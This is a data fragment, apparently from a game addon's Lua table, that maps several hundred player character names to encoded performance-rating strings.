["Iolbad"] = "RB:451/59%RM:515/58%",
["Metalwrath"] = "ET:319/88%EB:482/86%EM:923/94%",
["Gryme"] = "EB:743/93%SM:1016/99%",
["Nocash"] = "LB:768/96%LM:949/96%",
["Logician"] = "ST:665/99%SB:788/99%LM:934/97%",
["Quikfix"] = "UT:227/34%RB:416/54%UM:456/47%",
["Toromax"] = "LT:592/98%EB:746/94%EM:905/94%",
["Beric"] = "RB:491/65%RM:299/65%",
["Iep"] = "RT:421/56%RB:402/54%RM:400/72%",
["Amako"] = "UT:72/29%EB:651/82%EM:874/90%",
["Crimping"] = "UT:237/45%EB:416/80%RM:413/70%",
["Aiox"] = "EB:715/91%EM:896/92%",
["Animalbeast"] = "LT:441/95%EB:545/90%EM:473/89%",
["Zirael"] = "ET:494/89%LB:746/97%SM:999/99%",
["Mauge"] = "ET:659/86%LB:723/95%EM:765/87%",
["Dadoom"] = "SB:853/99%LM:970/98%",
["Tifaa"] = "EB:670/84%EM:872/89%",
["Garves"] = "CT:40/16%EB:671/85%EM:772/88%",
["Machomadness"] = "UT:65/26%RB:577/73%EM:877/87%",
["Fistality"] = "RT:134/50%RB:547/72%RM:666/74%",
["Kryptik"] = "RB:473/60%RM:673/72%",
["Ningjia"] = "EB:706/94%EM:538/87%",
["Shinyhype"] = "UB:365/49%EM:698/75%",
["Maharlika"] = "UT:129/49%EB:731/92%EM:916/94%",
["Ketchupninja"] = "EB:655/83%EM:902/92%",
["Indestrucble"] = "ET:307/87%RB:555/73%RM:373/72%",
["Gravitation"] = "ET:336/90%LB:742/95%LM:958/98%",
["Awing"] = "ET:677/91%LB:761/96%EM:831/91%",
["Noola"] = "EB:494/87%EM:766/80%",
["Lgtm"] = "CT:79/9%LB:768/96%EM:839/87%",
["Sitri"] = "EB:480/86%RM:668/72%",
["Shamanyin"] = "CB:7/9%",
["Dmanforsure"] = "ET:671/91%EB:722/94%EM:843/92%",
["Terraprisma"] = "CB:33/5%CM:40/2%",
["Snowpea"] = "CB:25/0%EM:766/88%",
["Orcavibes"] = "CT:37/6%RB:438/62%RM:662/72%",
["Strynger"] = "ET:305/86%EB:395/78%EM:658/91%",
["Vestus"] = "ET:735/94%EB:636/83%CM:139/19%",
["Griffstar"] = "RT:401/56%EB:604/79%RM:630/71%",
["Locknpop"] = "RB:543/71%RM:225/55%",
["Sweatlord"] = "CT:56/20%CB:185/24%UM:125/43%",
["Dabaroo"] = "CT:108/18%RB:430/56%RM:517/59%",
["Oortajr"] = "ET:418/78%EB:692/92%EM:858/93%",
["Demonatrixi"] = "LT:464/95%EB:511/88%EM:789/82%",
["Ayse"] = "RB:529/74%RM:448/53%",
["Ildulayll"] = "RT:558/74%EB:711/90%EM:818/85%",
["Eviserate"] = "ET:715/94%LB:708/98%EM:796/91%",
["Baiduu"] = "RT:520/68%EB:688/88%RM:441/50%",
["Firstbloodss"] = "UT:76/29%RB:381/53%UM:312/37%",
["Petpetpet"] = "ET:569/77%EB:656/84%EM:869/89%",
["Iamfish"] = "ET:563/75%EB:696/89%EM:784/81%",
["Tsvetaeva"] = "LT:551/97%EB:659/86%EM:604/89%",
["Deck"] = "ST:810/99%SB:737/99%SM:893/99%",
["Prederika"] = "ET:348/88%EB:633/82%EM:692/92%",
["Marchh"] = "RT:126/55%CB:70/19%RM:283/69%",
["Chón"] = "ET:632/83%EB:513/88%EM:727/79%",
["Caravaggio"] = "LT:526/96%LB:732/98%EM:778/81%",
["Zelek"] = "ET:691/90%EB:677/87%EM:792/84%",
["Poonassasin"] = "UT:103/40%EB:634/83%EM:888/92%",
["Gukleminus"] = "ET:724/94%LB:739/95%EM:657/84%",
["Tunkon"] = "ST:703/99%EB:695/89%LM:960/97%",
["Deadmushroom"] = "CT:172/22%RB:568/73%EM:850/87%",
["Dinoshot"] = "LT:536/97%LB:684/97%EM:862/89%",
["Nengetu"] = "ET:277/82%EB:615/94%EM:838/86%",
["Farmalot"] = "RT:377/50%RB:319/72%CM:122/11%",
["Undercity"] = "RT:458/61%RB:548/73%EM:784/81%",
["Vysion"] = "UT:75/30%RB:512/65%RM:516/55%",
["Laavozz"] = "ET:270/81%EB:584/81%RM:282/64%",
["Woop"] = "LT:557/98%SB:763/99%SM:987/99%",
["Rokmoo"] = "ET:640/93%EB:700/93%EM:710/94%",
["Yeezyyee"] = "RT:449/59%RB:511/68%RM:271/58%",
["Aisli"] = "LT:434/95%EB:669/90%EM:821/92%",
["Lockndload"] = "ET:678/88%EB:706/90%LM:817/96%",
["Eirrac"] = "ET:419/94%EB:577/92%LM:843/97%",
["Peako"] = "UT:325/46%EB:545/94%EM:673/85%",
["Gelbin"] = "UT:280/37%RB:324/68%CM:146/20%",
["Ktk"] = "RT:369/50%EB:615/81%EM:829/86%",
["Bigpanugget"] = "RT:198/69%EB:500/88%RM:700/74%",
["Missxx"] = "ET:311/84%EB:620/81%EM:446/78%",
["Naion"] = "ET:618/92%LB:717/95%LM:931/97%",
["Zombiespells"] = "LT:487/95%EB:567/91%EM:734/79%",
["Doomhaymer"] = "ST:718/99%EB:671/91%EM:778/89%",
["Buffetlordy"] = "ET:661/87%EB:586/93%LM:961/97%",
["Twoletter"] = "LT:589/98%RB:531/71%EM:554/84%",
["Nerdette"] = "ET:267/81%EB:734/93%EM:909/94%",
["Choson"] = "UT:93/36%EB:675/87%EM:755/81%",
["Ezhowzz"] = "ET:306/86%EB:420/81%LM:945/96%",
["Lequisha"] = "UT:361/49%UB:359/48%UM:416/46%",
["Rothbert"] = "LT:606/97%LB:619/95%LM:893/95%",
["Prîsoner"] = "ET:592/78%EB:682/87%RM:687/71%",
["Razcal"] = "ET:689/94%EB:421/89%EM:748/90%",
["Moneyu"] = "RT:238/73%EB:583/76%RM:610/63%",
["Essentia"] = "ET:698/94%EB:655/93%EM:741/90%",
["Saathoff"] = "LT:762/97%EB:726/94%EM:750/88%",
["Owlbear"] = "LT:733/96%LB:607/97%EM:817/93%",
["Worldfear"] = "RT:350/50%RB:460/61%UM:332/39%",
["Ionly"] = "ET:199/75%RB:509/71%EM:402/81%",
["Masacurtwo"] = "LT:412/95%SB:754/99%SM:808/99%",
["Kusher"] = "LT:428/95%EB:638/88%EM:752/87%",
["Sertralean"] = "RT:220/64%UB:179/47%EM:618/76%",
["Gstríng"] = "LT:733/95%EB:698/92%LM:903/95%",
["Castanova"] = "ET:725/93%LB:614/96%LM:930/95%",
["Mcstanks"] = "RB:419/55%RM:619/70%",
["Chibí"] = "LT:492/95%EB:648/84%EM:749/80%",
["Anglewood"] = "LT:645/98%LB:752/95%LM:935/95%",
["Fright"] = "UT:308/40%LB:768/96%LM:779/97%",
["Subterfüge"] = "EB:700/88%EM:813/84%",
["Killerthrill"] = "ET:657/85%EB:676/87%EM:706/76%",
["Tomak"] = "UT:90/35%EB:746/94%LM:953/97%",
["Sputnut"] = "RT:375/63%EB:440/87%EM:792/89%",
["Abracadaver"] = "ET:342/90%EB:671/90%LM:780/97%",
["Belgianblue"] = "ET:337/90%EB:546/90%EM:713/93%",
["Brogatyrka"] = "RT:446/60%LB:639/96%EM:906/93%",
["Livinbacon"] = "UT:114/44%EB:487/86%EM:418/76%",
["Imapathetic"] = "ET:604/79%EB:722/91%LM:958/97%",
["Googleit"] = "EB:588/75%EM:804/84%",
["Ryxos"] = "ET:489/75%EB:620/87%EM:629/80%",
["Artemos"] = "ET:400/93%EB:744/94%EM:782/82%",
["Easymoneyx"] = "RT:509/69%RB:492/65%RM:660/73%",
["Eiden"] = "RT:163/60%EB:744/94%LM:962/97%",
["Shoei"] = "UT:247/32%EB:602/77%EM:712/75%",
["Tactz"] = "ET:443/87%EB:661/93%EM:757/91%",
["Chromis"] = "ET:280/83%EB:497/87%EM:814/87%",
["Kamir"] = "UT:104/38%EB:422/80%EM:830/85%",
["Faygodreamin"] = "RT:188/63%RB:546/70%EM:706/75%",
["Momoda"] = "ET:617/81%EB:564/91%RM:288/63%",
["Zxanthia"] = "UT:202/30%EB:607/77%RM:552/59%",
["Kinkerbang"] = "ET:412/94%LB:726/95%EM:754/85%",
["Erokos"] = "CT:48/5%UB:203/48%UM:404/46%",
["Yellafeva"] = "ET:328/89%EB:592/77%EM:582/87%",
["Dubsack"] = "ET:307/87%RB:347/72%EM:751/94%",
["Dirtfreckle"] = "ET:271/82%EB:579/76%RM:529/60%",
["Pyrotakknic"] = "RT:454/61%LB:777/97%EM:917/94%",
["Kikashi"] = "CT:70/24%EB:679/86%EM:821/85%",
["Wingbat"] = "ET:302/87%RB:453/60%EM:529/84%",
["Sathuzand"] = "RT:180/61%RB:548/70%EM:880/90%",
["Pamelina"] = "EB:611/80%EM:484/79%",
["Emjay"] = "UT:294/40%EB:687/88%EM:814/86%",
["Primordiux"] = "EB:735/93%EM:885/92%",
["Edeleth"] = "EB:654/89%RM:466/51%",
["Dröög"] = "EB:676/91%LM:930/97%",
["Darklightnin"] = "UB:367/49%RM:262/57%",
["Misfyre"] = "LT:507/97%EB:685/87%EM:754/87%",
["Kisuke"] = "RB:421/57%EM:850/87%",
["Vingha"] = "LB:771/97%LM:942/96%",
["Griphoff"] = "EB:682/87%EM:835/86%",
["Thizzelle"] = "RB:471/67%EM:383/79%",
["Fireblast"] = "CT:74/13%CB:95/12%RM:717/73%",
["Anactualalt"] = "UB:139/38%RM:480/57%",
["Lilcash"] = "CT:39/11%UB:340/43%UM:396/40%",
["Rufir"] = "EB:722/94%EM:736/80%",
["Pewford"] = "EB:366/75%RM:272/64%",
["Magicpanties"] = "EB:599/79%EM:789/84%",
["Biglegman"] = "ET:600/79%LB:731/95%CM:222/22%",
["Imddt"] = "CB:139/18%CM:133/13%",
["Mediocrite"] = "CT:19/10%UB:102/29%RM:222/61%",
["Rtfm"] = "EB:622/82%LM:910/96%",
["Pikachuzz"] = "UT:288/39%EB:751/94%RM:730/70%",
["Shunoha"] = "ET:716/92%EB:681/87%EM:881/91%",
["Spaceburrito"] = "RT:532/73%LB:634/95%EM:867/90%",
["Exitwounds"] = "ET:618/82%RB:540/73%UM:301/34%",
["Distine"] = "ET:286/81%EB:591/78%EM:467/79%",
["Loldestiny"] = "RT:161/58%RB:500/66%EM:832/88%",
["Hitdehbutton"] = "ET:568/77%EB:611/81%EM:743/78%",
["Ribet"] = "ST:734/99%LB:610/96%LM:810/98%",
["Tunechí"] = "LT:616/98%EB:602/94%EM:861/91%",
["Lemidget"] = "ET:327/86%EB:656/85%EM:439/77%",
["Samsarakarma"] = "RT:526/70%EB:599/78%EM:736/76%",
["Rainbowbabe"] = "ET:367/90%EB:729/92%EM:820/85%",
["Shannarah"] = "ET:399/86%EB:531/86%EM:278/77%",
["Schlitzedd"] = "ET:631/84%EB:654/85%EM:598/88%",
["Snodrift"] = "UT:110/42%RB:411/58%",
["Syndicator"] = "CT:68/23%RB:375/50%CM:195/23%",
["Marvo"] = "LT:468/95%EB:667/85%EM:834/86%",
["Wusa"] = "ET:562/76%EB:636/86%EM:797/90%",
["Millsey"] = "ET:260/78%EB:423/80%RM:295/61%",
["Sjurty"] = "CT:151/19%RB:497/72%CM:95/8%",
["Skeens"] = "LT:722/97%SB:786/99%LM:843/98%",
["Dacucumbla"] = "ET:579/89%LB:635/97%LM:901/95%",
["Wayvo"] = "RT:180/64%RB:516/74%EM:571/89%",
["Applesidra"] = "ET:355/91%EB:428/81%EM:627/89%",
["Xantheron"] = "CT:27/6%EB:589/78%EM:716/78%",
["Spazarus"] = "ET:422/94%EB:463/85%RM:364/73%",
["Coomron"] = "RT:415/57%EM:810/85%",
["Jypp"] = "ET:357/91%EB:663/85%EM:533/84%",
["Shrezz"] = "ET:388/93%EB:404/79%EM:601/88%",
["Steamrolla"] = "RT:521/69%EB:691/88%EM:855/90%",
["Zoolmf"] = "ET:644/84%EB:620/94%EM:898/94%",
["Wangtl"] = "ET:731/94%LB:688/97%RM:689/74%",
["Cheehee"] = "ET:638/84%EB:689/88%EM:589/88%",
["Mattÿ"] = "ET:339/90%EB:397/83%EM:533/89%",
["Ketchom"] = "ET:255/79%EB:688/88%EM:867/89%",
["Saukmikehawk"] = "CT:56/6%CB:123/16%CM:85/8%",
["Hottshott"] = "RT:509/69%EB:586/93%EM:763/80%",
["Arjac"] = "RT:408/57%RB:349/74%RM:368/74%",
["Descanreaux"] = "LT:516/96%EB:635/83%EM:744/77%",
["Fengchui"] = "ET:615/87%EB:541/93%UM:445/41%",
["Bowner"] = "RT:407/55%EB:665/86%EM:822/85%",
["Kosnov"] = "ET:681/89%EB:727/92%EM:718/77%",
["Emilin"] = "RT:560/73%EB:580/92%EM:884/92%",
["Smittywerber"] = "ST:792/99%SB:811/99%LM:954/98%",
["Silentrose"] = "UT:231/34%RB:468/62%UM:327/38%",
["Alderak"] = "LT:457/96%EB:709/93%EM:757/89%",
["Maokaiw"] = "ET:261/80%EB:590/93%RM:619/69%",
["Shakerskr"] = "LT:468/96%LB:612/96%EM:726/87%",
["Steparu"] = "CT:38/4%EB:587/78%EM:787/83%",
["Croctor"] = "ET:619/87%EB:675/90%EM:814/90%",
["Laszune"] = "RT:516/70%RB:506/69%UM:389/43%",
["Arctuva"] = "ST:680/99%SB:686/99%LM:647/96%",
["Sunsinmyeyes"] = "UT:241/32%EB:713/91%EM:573/87%",
["Aroh"] = "RB:414/54%EM:478/81%",
["Snide"] = "ET:260/79%EB:637/81%RM:351/67%",
["Adooken"] = "ET:671/87%LB:718/98%EM:864/91%",
["Tsmc"] = "ET:611/86%LB:603/96%EM:886/93%",
["Shänks"] = "RB:477/64%RM:640/70%",
["Mongoo"] = "UT:233/31%EB:719/91%EM:869/89%",
["Kogranola"] = "ET:239/76%EB:448/83%EM:588/87%",
["Tigtone"] = "LB:755/95%SM:996/99%",
["Spectrre"] = "RT:172/61%EB:589/75%RM:677/72%",
["Rakdaddy"] = "SB:799/99%LM:984/98%",
["Ironbuck"] = "UT:79/28%RB:366/74%EM:478/78%",
["Brynn"] = "RB:411/55%UM:355/41%",
["Fulblownaids"] = "CT:53/17%RB:384/52%RM:635/68%",
["Zieja"] = "CT:170/22%EB:632/80%EM:817/84%",
["Blastõff"] = "EB:687/89%SM:889/99%",
["Pokenpop"] = "UB:366/49%RM:473/53%",
["Lotophago"] = "EB:407/79%RM:614/66%",
["Amazin"] = "LT:784/98%EB:746/94%LM:974/98%",
["Aamo"] = "LT:563/97%EB:611/94%EM:819/87%",
["Skeezix"] = "EB:708/89%EM:853/88%",
["Deadots"] = "EB:646/84%RM:593/61%",
["Zøro"] = "ET:333/89%EB:606/79%EM:717/85%",
["Blackfriend"] = "UT:81/33%RB:297/73%RM:624/70%",
["Spiraldown"] = "CT:68/13%EB:625/79%EM:835/87%",
["Angriff"] = "RT:543/73%EB:673/86%EM:621/83%",
["Hailuoyin"] = "LT:761/97%LB:781/98%SM:973/99%",
["Prevalence"] = "LT:485/96%EB:741/94%LM:961/97%",
["Ballpunchy"] = "ET:713/92%LB:734/95%LM:952/98%",
["Krakenlee"] = "ET:353/90%EB:715/91%EM:911/94%",
["Audusd"] = "RB:271/60%EM:893/92%",
["Truedamage"] = "ET:602/78%EB:613/80%RM:595/65%",
["Cici"] = "LT:601/98%EB:696/89%EM:730/78%",
["Thofoo"] = "ET:361/91%UB:190/45%EM:443/76%",
["Frostysacks"] = "ET:437/94%LB:595/95%LM:947/96%",
["Titanmoo"] = "UT:273/38%RB:461/60%EM:715/78%",
["Dakkmage"] = "RT:529/74%EB:716/94%EM:836/91%",
["Rpk"] = "UT:360/48%RB:508/68%RM:280/62%",
["Vulcano"] = "UT:271/39%EB:658/88%EM:863/93%",
["Jackstab"] = "UB:327/43%RM:538/60%",
["Dencia"] = "UB:97/28%",
["Arelias"] = "RT:228/72%EB:564/75%RM:535/59%",
["Chodesnax"] = "ET:688/88%EB:707/90%RM:669/72%",
["Warzone"] = "LT:464/96%LB:693/98%LM:824/98%",
["Ceraeza"] = "LT:451/95%EB:628/81%EM:836/89%",
["Grandpawner"] = "EB:731/93%EM:901/93%",
["Zultin"] = "RT:157/54%UB:304/41%RM:358/71%",
["Sunnyforever"] = "RT:218/72%CB:180/24%RM:324/74%",
["Hulkitydooda"] = "ET:691/89%LB:782/98%EM:908/94%",
["Duliuzi"] = "RT:360/52%RB:427/59%RM:610/71%",
["Atiesh"] = "ET:443/94%LB:662/96%EM:898/92%",
["Damightyhuff"] = "CT:62/23%EB:383/77%EM:690/75%",
["Valu"] = "LT:489/96%RB:426/55%RM:605/68%",
["Prisoner"] = "RT:491/66%EB:733/93%EM:882/91%",
["Onrehabz"] = "RT:214/70%UB:328/43%UM:421/44%",
["Runfaster"] = "ET:321/87%EB:738/93%EM:837/86%",
["Kamelonious"] = "RT:326/71%EB:484/77%EM:704/84%",
["Tënseiga"] = "UT:120/43%RB:349/71%RM:550/61%",
["Peonn"] = "RT:538/71%UB:367/49%UM:250/31%",
["Momomoda"] = "ET:230/75%RB:558/74%RM:514/59%",
["Naurel"] = "RT:384/52%EB:641/84%RM:658/71%",
["Coronä"] = "ET:301/86%RB:439/58%RM:194/50%",
["Ventus"] = "LT:748/96%SB:751/99%LM:928/97%",
["Usherkj"] = "ET:669/87%EB:641/83%RM:618/64%",
["Moäna"] = "ET:246/75%EB:664/86%EM:443/78%",
["Vindicty"] = "UT:269/39%UB:313/38%UM:139/41%",
["Sheepsoul"] = "LT:756/97%LB:750/96%SM:987/99%",
["Momomage"] = "ET:385/92%EB:418/83%EM:639/76%",
["Qaos"] = "UT:217/28%EB:582/76%RM:514/53%",
["Sipgreygoose"] = "UT:234/31%UB:140/36%RM:213/54%",
["Snipergang"] = "ET:609/81%EB:718/91%EM:712/75%",
["Theraka"] = "CT:93/11%RB:275/62%UM:373/42%",
["Soulfiree"] = "LT:477/95%EB:725/92%EM:860/89%",
["Dieseltruck"] = "ET:294/85%EB:596/93%RM:372/72%",
["Stocktips"] = "ET:647/89%EB:622/85%EM:736/86%",
["Wigglz"] = "ET:299/83%EB:435/81%EM:828/86%",
["Nastycat"] = "UT:219/29%EB:714/90%EM:901/92%",
["Blackdoug"] = "LT:582/97%LB:647/96%EM:475/80%",
["Kitkat"] = "UT:135/48%RB:523/68%RM:592/61%",
["Huntartelf"] = "RT:491/67%RM:534/56%",
["Rayther"] = "ET:615/82%EB:596/79%EM:817/86%",
["Livinfailure"] = "LT:508/96%LB:653/96%EM:900/92%",
["Spiderkitty"] = "ET:676/88%EB:704/90%CM:109/15%",
["Atkhunter"] = "UT:274/36%UB:316/43%RM:603/64%",
["Entertainmen"] = "LT:444/95%EB:612/81%RM:341/71%",
["Darkbrew"] = "ET:408/94%EB:635/82%EM:651/90%",
["Peonmybutt"] = "RT:208/68%CM:41/16%",
["Forklift"] = "RT:200/69%RB:539/71%RM:393/68%",
["Stalecheetos"] = "ET:302/86%EB:563/76%RM:691/73%",
["Crashyo"] = "UT:257/35%EB:608/79%RM:654/70%",
["Maiv"] = "CT:148/19%CB:150/19%RM:695/74%",
["Ghudda"] = "ET:395/94%LB:597/95%EM:810/90%",
["Hardarr"] = "ET:696/92%EB:656/89%EM:873/93%",
["Thlayli"] = "ET:262/84%EB:661/91%EM:731/89%",
["Tazeela"] = "ET:690/92%EB:715/90%EM:554/92%",
["Xenbiotic"] = "ET:282/88%LB:628/98%SM:973/99%",
["Swilldog"] = "ST:730/99%LB:710/97%EM:844/87%",
["Naochi"] = "CT:42/4%CB:135/17%UM:355/41%",
["Wetazzpword"] = "RT:435/59%RB:355/50%CM:171/23%",
["Morvevevia"] = "RB:207/54%UM:119/42%",
["Jóint"] = "UT:363/48%EB:627/82%RM:219/54%",
["Bahsnuz"] = "ST:701/99%EB:688/94%LM:786/97%",
["Wildyeti"] = "UM:288/48%",
["Hanneslore"] = "CM:53/20%",
["Eip"] = "CM:119/16%",
["Nockie"] = "CM:167/22%",
["Gronkor"] = "LT:500/96%EB:507/78%RM:353/73%",
["Tinkertoy"] = "RT:129/54%EB:558/79%EM:697/84%",
["Yiliu"] = "LT:531/96%EB:582/92%RM:668/72%",
["Psa"] = "ET:396/90%EB:624/88%EM:641/80%",
["Heys"] = "UT:266/32%EB:361/78%EM:708/85%",
["Qtcutie"] = "ET:344/91%RB:338/59%RM:431/71%",
["Terodynamics"] = "LT:562/97%EB:737/93%EM:857/86%",
["Bearblasting"] = "LT:497/96%EB:594/93%EM:747/79%",
["Meownyou"] = "UT:227/30%LB:782/98%LM:997/98%",
["Lexxonia"] = "RT:169/58%UB:190/26%UM:111/36%",
["Defood"] = "LT:517/96%EB:699/89%EM:726/77%",
["Zulk"] = "LT:515/96%EB:690/89%EM:843/89%",
["Silviana"] = "CT:30/4%RM:369/64%",
["Gankfarm"] = "LT:446/95%EB:646/84%EM:820/87%",
["Phaes"] = "LT:763/96%EB:705/89%EM:901/92%",
["Femalenurse"] = "CT:51/12%RB:487/70%RM:380/74%",
["Justingo"] = "ET:302/85%LB:643/98%LM:808/97%",
["Timesink"] = "RB:210/52%UM:360/38%",
["Soulcheese"] = "RT:396/53%EB:501/87%UM:410/41%",
["Niam"] = "ST:714/99%LB:678/98%EM:902/93%",
["Momoman"] = "ST:733/99%SB:810/99%LM:787/98%",
["Fortezza"] = "UT:282/40%EB:308/80%EM:557/80%",
["Oatss"] = "LT:680/98%EB:728/93%LM:963/97%",
["Gambullz"] = "ET:701/90%EB:586/92%EM:703/77%",
["Yaeger"] = "ST:771/99%SB:765/99%LM:975/98%",
["Crai"] = "ST:762/99%LB:714/98%EM:925/94%",
["Shannon"] = "ST:675/99%SB:716/99%LM:926/97%",
["Cecchino"] = "LT:506/96%EB:479/86%EM:384/75%",
["Warscott"] = "ST:780/99%LB:702/98%LM:959/97%",
["Fënix"] = "ST:702/99%LB:660/97%LM:935/95%",
["Ist"] = "ST:767/99%LB:626/96%LM:945/95%",
["Sheepsickle"] = "RT:194/67%RB:505/67%EM:850/89%",
["Tahr"] = "UT:206/26%EB:361/79%EM:349/76%",
["Scottha"] = "CT:33/1%UM:384/45%",
["Ghonk"] = "CB:68/6%RM:190/51%",
["Bluddybadger"] = "RT:202/67%UB:192/26%UM:205/26%",
["Slice"] = "ET:381/93%RB:499/67%EM:723/76%",
["Eschaton"] = "RT:165/57%RB:516/66%EM:862/88%",
["Trihardxd"] = "ET:293/86%RB:408/60%EM:653/78%",
["Khaosmage"] = "CT:41/13%RB:509/68%EM:729/79%",
["Larinne"] = "ET:303/86%RB:510/70%RM:565/63%",
["Wonderbae"] = "ET:290/84%EB:648/88%EM:804/86%",
["Boxsoup"] = "RT:179/61%UB:198/47%UM:410/47%",
["Crysvara"] = "ET:432/94%RB:504/68%RM:648/70%",
["Paltro"] = "RT:198/69%RB:435/58%UM:282/34%",
["Thanago"] = "ST:620/99%EB:726/94%LM:919/95%",
["Orohime"] = "LT:409/95%LB:732/96%LM:896/98%",
["Mindyou"] = "LT:554/98%LB:745/95%SM:987/99%",
["Waltz"] = "ET:387/94%EB:557/82%EM:724/86%",
["Ilsll"] = "ET:257/80%EB:632/82%EM:853/88%",
["Badjack"] = "LT:532/98%EB:580/84%EM:835/91%",
["Forks"] = "LT:358/96%EB:494/83%EM:623/84%",
["Undeadpool"] = "ET:465/94%EB:607/79%EM:470/80%",
["Sheepfeeder"] = "LT:465/96%EB:666/89%EM:790/89%",
["Fredz"] = "ET:658/90%RB:386/64%RM:395/68%",
["Loggervick"] = "UB:338/44%EM:717/76%",
["Metalcoree"] = "RT:475/60%EB:548/93%RM:522/60%",
["Tydppyy"] = "ET:572/90%LB:626/96%EM:648/92%",
["Deathcoree"] = "ET:582/76%LB:671/96%EM:764/81%",
["Kerberous"] = "RT:210/62%EB:616/85%EM:879/93%",
["Grankain"] = "ET:377/93%EB:678/90%EM:792/89%",
["Xiaoü"] = "UT:102/46%RB:516/74%RM:538/63%",
["Robinqaq"] = "ET:682/88%EB:590/77%RM:345/69%",
["Seawolf"] = "LT:759/97%LB:752/96%EM:827/92%",
["Verdontanks"] = "RT:520/70%RB:527/70%RM:298/64%",
["Segrath"] = "LT:769/97%LB:753/96%LM:910/96%",
["Auron"] = "ET:645/89%EB:702/92%EM:770/88%",
["Iveryn"] = "ET:693/93%LB:554/96%LM:881/95%",
["Doodlew"] = "RT:544/73%EB:722/91%RM:336/63%",
["Diozz"] = "LT:759/96%EB:686/92%RM:519/64%",
["Snoodler"] = "ET:706/91%EB:563/91%EM:931/94%",
["Littleshen"] = "LT:748/95%EB:528/89%EM:918/94%",
["Filfax"] = "UT:214/28%EB:562/76%EM:753/79%",
["Aggresean"] = "ET:649/89%RB:447/71%EM:526/78%",
["Ironmanbull"] = "LT:548/97%EB:592/93%LM:849/97%",
["Ersica"] = "LT:495/95%RB:325/68%EM:532/84%",
["Deadhunt"] = "LT:542/97%LB:678/97%LM:867/98%",
["Kopijadul"] = "ET:360/94%EB:486/90%LM:760/96%",
["Eize"] = "LT:666/98%LB:660/96%EM:877/91%",
["Haunterxzero"] = "ET:356/90%RB:316/68%EM:529/84%",
["Rocklee"] = "LT:497/96%LB:615/97%LM:860/98%",
["Vaucouleurs"] = "LT:497/95%EB:551/90%EM:745/94%",
["Jalcolima"] = "ET:237/76%EB:513/88%EM:648/90%",
["Bbqboss"] = "LT:554/97%LB:687/98%LM:798/98%",
["Slitzz"] = "ET:338/88%EB:549/90%EM:680/90%",
["Woodslinger"] = "ET:231/75%EB:407/79%RM:371/72%",
["Oogumßoogum"] = "RT:203/67%CB:45/4%UM:218/26%",
["Wesstra"] = "RT:197/65%EB:410/78%EM:530/82%",
["Stahar"] = "LT:585/98%SB:691/99%SM:827/99%",
["Chulghurax"] = "UT:97/39%UB:237/25%RM:306/52%",
["Filayu"] = "ET:278/81%RB:324/68%EM:448/76%",
["Blackops"] = "LT:537/97%EB:581/76%EM:588/88%",
["Reptile"] = "UT:77/28%RB:450/60%RM:612/67%",
["Stayaway"] = "UT:91/35%UB:232/31%UM:230/32%",
["Streade"] = "RT:195/67%EB:379/80%LM:726/96%",
["Bõwjob"] = "RT:495/67%EB:687/88%EM:486/82%",
["Supra"] = "ET:607/80%EB:504/87%RM:264/61%",
["Nuffin"] = "RT:436/57%EB:711/94%EM:833/92%",
["Xnoc"] = "ET:606/80%EB:577/83%EM:820/87%",
["Samsnipe"] = "ET:711/91%EB:745/94%EM:842/88%",
["Oboroten"] = "ET:577/90%EB:687/94%LM:750/96%",
["Nongmobull"] = "ET:512/76%LB:691/95%EM:810/94%",
["Saevus"] = "RT:470/62%EB:678/87%EM:481/80%",
["Micky"] = "ET:715/94%LB:615/96%LM:649/95%",
["Imondrugs"] = "RT:530/70%EB:488/86%EM:469/80%",
["Juicebad"] = "RT:508/67%LB:752/97%EM:829/92%",
["Azzarek"] = "RT:457/62%EB:569/75%UM:429/49%",
["Troi"] = "ET:256/81%EB:394/83%EM:540/78%",
["Tillson"] = "LT:631/98%EB:672/91%EM:841/93%",
["Ezrax"] = "ET:324/87%RB:464/67%EM:646/77%",
["Beeraad"] = "ET:402/94%EB:703/89%EM:800/85%",
["Ansatsu"] = "RT:164/57%EB:567/75%RM:489/55%",
["Gladies"] = "CM:65/10%",
["Ukuk"] = "UT:94/29%UB:304/41%CM:106/12%",
["Slatyr"] = "RT:521/71%EB:689/88%EM:906/94%",
["Zhyrkov"] = "CT:112/19%RM:456/53%",
["Jackintebox"] = "RT:188/63%EB:684/87%EM:769/81%",
["Merksauce"] = "ET:432/94%EB:612/81%EM:480/86%",
["Halto"] = "LT:540/97%EB:639/88%LM:704/95%",
["Jey"] = "CT:116/20%RB:446/62%RM:476/56%",
["Codoy"] = "LT:636/98%LB:755/96%LM:945/98%",
["Windruid"] = "UT:24/49%RB:514/73%UM:364/44%",
["Daviesdead"] = "CT:88/8%RM:355/60%",
["Josim"] = "CT:58/6%CB:41/8%UM:384/44%",
["Iautoshoot"] = "ET:651/86%EB:736/93%EM:579/87%",
["Narcisus"] = "RT:138/58%CB:121/14%EM:678/78%",
["Loötgoblin"] = "UB:281/35%UM:421/43%",
["Micijah"] = "LT:502/96%EB:715/91%EM:877/91%",
["Cants"] = "CB:173/23%UM:399/47%",
["Flipswick"] = "RM:473/51%",
["Magekmike"] = "CT:41/4%CB:82/21%CM:116/16%",
["Zerakul"] = "LT:543/97%EB:635/88%EM:706/86%",
["Rata"] = "UT:275/35%UB:213/49%UM:404/46%",
["Morsmoredre"] = "LT:557/97%EB:622/86%LM:928/95%",
["Siiko"] = "RT:379/52%EB:620/80%EM:782/89%",
["Tutubo"] = "LT:674/98%EB:690/92%EM:886/92%",
["Verrotten"] = "LT:576/97%EB:647/84%EM:809/84%",
["Onyxblack"] = "ET:377/92%EB:583/76%RM:270/61%",
["Frznsnak"] = "ET:309/86%RB:492/71%EM:663/78%",
["Dirtycookie"] = "LT:520/97%LB:694/95%EM:765/92%",
["Tilez"] = "ST:742/99%LB:751/95%EM:826/85%",
["Strwhatluffy"] = "ST:692/99%EB:705/94%EM:657/80%",
["Fzynutsdeath"] = "ST:636/99%LB:637/97%EM:861/94%",
["Ulaa"] = "CT:57/19%CB:146/19%UM:68/26%",
["Teshu"] = "LT:425/95%LB:596/95%LM:920/95%",
["Soza"] = "ET:423/80%RB:422/71%RM:570/73%",
["Unhert"] = "ET:363/91%LB:760/95%LM:965/97%",
["Krackan"] = "ET:300/86%EB:419/80%RM:686/73%",
["Avarrae"] = "LT:510/96%EB:521/88%EM:813/84%",
["Rumraisin"] = "ET:333/88%EB:405/82%EM:833/88%",
["Wormlord"] = "LT:472/95%EB:546/90%EM:871/90%",
["Giqqle"] = "ET:286/83%EB:692/88%EM:835/87%",
["Okute"] = "LT:485/96%LB:632/95%LM:934/95%",
["Poisonnivy"] = "ET:287/84%EB:627/79%EM:821/85%",
["Beefychief"] = "CT:71/6%CB:65/13%UM:227/27%",
